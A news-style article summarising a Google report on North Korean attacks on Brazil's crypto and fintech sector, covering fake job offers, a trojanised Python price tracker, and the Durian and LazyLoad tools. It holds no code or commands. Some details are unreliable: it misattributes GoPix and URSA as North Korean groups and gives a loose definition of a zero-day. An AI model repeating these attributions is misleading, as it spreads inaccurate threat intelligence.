The Google report dated June 13 draws attention to coordinated attack attempts against individuals and organizations operating in the cryptocurrency and fintech sector in Brazil. It is stated that ransomware, phishing and fraud methods are used in these attacks.

The report emphasizes that Chinese government-backed cybercriminals also target Brazil, but these attacks generally focus on government organizations and the energy sector. This suggests that North Korean attackers are trying to penetrate Brazil’s rapidly developing digital economy.

So, what methods do North Korean attackers use? Pukchong (also known as UNC4899), North Korea’s leading cybercrime group, is targeting Brazilian citizens and organizations through the labor market, according to the report. Attackers trick job seekers into downloading them by presenting them with fake job postings containing disguised malware.

In one example mentioned in the report, a Python application used to track cryptocurrency prices was turned into a Trojan horse. This app connects to an attacker-controlled server and downloads additional malware when certain conditions are met. In this way, attackers can gain full access to the targeted system.

Other information contained in the report reveals that other North Korean hacker groups, such as GoPix and URSA, also targeted cryptocurrency exchanges in Brazil with similar methods. This shows that the Brazilian cryptocurrency market has become an attractive target for North Korean cybercriminals.

The techniques used by attackers are not limited to Brazil. Recently, cryptocurrency wallet Trust Wallet advised Apple users to disable the iMessage application. This recommendation stems from concerns about a zero-day vulnerability. A zero-day vulnerability means a vulnerability in the software that has not yet been discovered. By exploiting this vulnerability, attackers can take control of users’ phones.

The activities of North Korean attackers are not limited to Brazil. Cybersecurity firm Kaspersky recently detected that a North Korean hacker group called Kimsuky was using a new malware called “Durian” to attack South Korean cryptocurrency exchanges. Durian has advanced backdoor functions that give attackers full access to the targeted system.

Kaspersky also states that another North Korean hacker group called Andariel uses a tool called LazyLoad, which is also used in similar attacks. This suggests that there may be cooperation or at least information sharing between North Korean hacker groups.

In conclusion, the Google Cloud report reveals that North Korean cybercriminals pose a serious threat to Brazil’s emerging cryptocurrency and fintech sector. To counter these threats, governments, cryptocurrency exchanges, fintech companies, and individuals need to tighten cybersecurity measures. It is also important that users do not click on suspicious links, use strong passwords, and update software regularly.

The measures taken by Brazil against North Korean cyber attacks and the security vulnerabilities of these attacks in the global cryptocurrency market shed light. This situation once again emphasizes the importance of international cooperation for the future of cryptocurrencies and the protection of digital assets.